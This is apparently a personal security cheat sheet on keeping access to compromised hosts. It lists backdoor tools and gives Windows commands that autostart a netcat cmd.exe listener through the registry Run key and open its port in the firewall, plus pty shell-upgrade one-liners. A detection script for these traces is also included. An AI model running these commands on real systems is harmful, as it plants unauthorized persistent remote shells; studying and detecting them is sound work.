akde/infosec

Information security is ultimately about managing risk


Weevely

https://tools.kali.org/maintaining-access/weevely

Generates a PHP script on the server that can be used to get a shell back.

Various scripts

Shellter (win32)

Dynamic shell injection tool into normal Windows binaries.

https://tools.kali.org/maintaining-access/shellter

Create own (normal) shell

  • Create an open shell via netcat.
  • Create an open shell via dbd (https://tools.kali.org/maintaining-access/shellter)

HTTPTunnel

Needs PHP; creates a file on a server which acts as an SSH proxy.

Nishang

Collection of PowerShell scripts for backdoors and more.

Kali:/usr/share/nishang

dns2tcp

Creates a TCP tunnel via a DNS server.

psexec

Use psexec from Impacket to create a regularly running script.

Windows

Autostart nc

  1. Upload nc to the server (e.g. from /usr/share/windows-binaries/nc.exe)
    Set the autorun registry entry:
    REG ADD HKLM\software\microsoft\windows\currentversion\run /v "nc" /t REG_SZ /d "C:\Users\w7vm\Desktop\nc.exe -Ldp 4488 -e cmd.exe"
  2. Add a new firewall rule
    netsh firewall add portopening TCP 4488 "Service Firewall" ENABLE ALL
  3. Double check that the rule is active now
    netsh firewall show portopening

Warning: Windows may show a confirmation popup at startup before starting netcat.
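Seen from the detection side, the steps above leave two command-line traces: a write to the Run key and a new inbound firewall opening on the same port. The following is an added example, not part of the original notes. It scans process-creation command lines for both traces and correlates them by port. The sample lines are constructed, and the rule names are assumptions.

```python
import re

RUN_KEY = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?:HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)'
    r'\\software\\microsoft\\windows\\currentversion\\run(?:once)?\b(?P<rest>.*)', re.I)
VALUE_DATA = re.compile(r'/d\s+"(?P<data>[^"]*)"', re.I)
# netcat-style flags inside the autorun value: "-e <shell>" and a flag cluster ending in "p <port>"
EXEC_SHELL = re.compile(r'(?<!\S)-e\s+\S*(?:cmd|powershell)(?:\.exe)?', re.I)
LISTEN_PORT = re.compile(r'(?<!\S)-[a-z]*p\s+(?P<port>\d{1,5})\b', re.I)
FW_LEGACY = re.compile(
    r'\bnetsh\s+firewall\s+add\s+portopening\s+(?:TCP|UDP)\s+(?P<port>\d{1,5})\b', re.I)
FW_ADV = re.compile(
    r'\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\blocalport=(?P<port>\d{1,5})\b', re.I)

# Constructed command lines, as they would appear in process-creation logs; not real data.
SAMPLE_EVENTS = [
    r'REG ADD HKLM\software\microsoft\windows\currentversion\run /v "nc" /t REG_SZ /d "C:\Users\w7vm\Desktop\nc.exe -Ldp 4488 -e cmd.exe"',
    r'netsh firewall add portopening TCP 4488 "Service Firewall" ENABLE ALL',
    r'netsh firewall show portopening',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d "C:\Program Files\OneDrive\OneDrive.exe /background"',
    r'netsh advfirewall firewall add rule name="Web" dir=in action=allow protocol=TCP localport=443',
]

def analyze(command_lines):
    """Return (findings, correlated_ports) for a sequence of command lines."""
    findings, autorun_ports, opened_ports = [], set(), set()
    for i, line in enumerate(command_lines):
        run = RUN_KEY.search(line)
        if run:
            data = VALUE_DATA.search(run.group("rest"))
            payload = data.group("data") if data else ""
            port = LISTEN_PORT.search(payload)
            if EXEC_SHELL.search(payload) or port:
                findings.append((i, "run_key_listener", payload))
                if port:
                    autorun_ports.add(int(port.group("port")))
            else:
                findings.append((i, "run_key_write", payload))
        fw = FW_LEGACY.search(line) or FW_ADV.search(line)
        if fw:
            opened_ports.add(int(fw.group("port")))
            findings.append((i, "firewall_port_opened", fw.group("port")))
    # A port that an autostart entry listens on and the firewall now allows
    # is the strongest signal: persistence plus inbound reachability.
    return findings, autorun_ports & opened_ports

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS)[0]:
        print(finding)
```

A plain `run_key_write` is common for legitimate software, so it is best treated as context; the correlated port set is what merits an alert.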


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.


python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';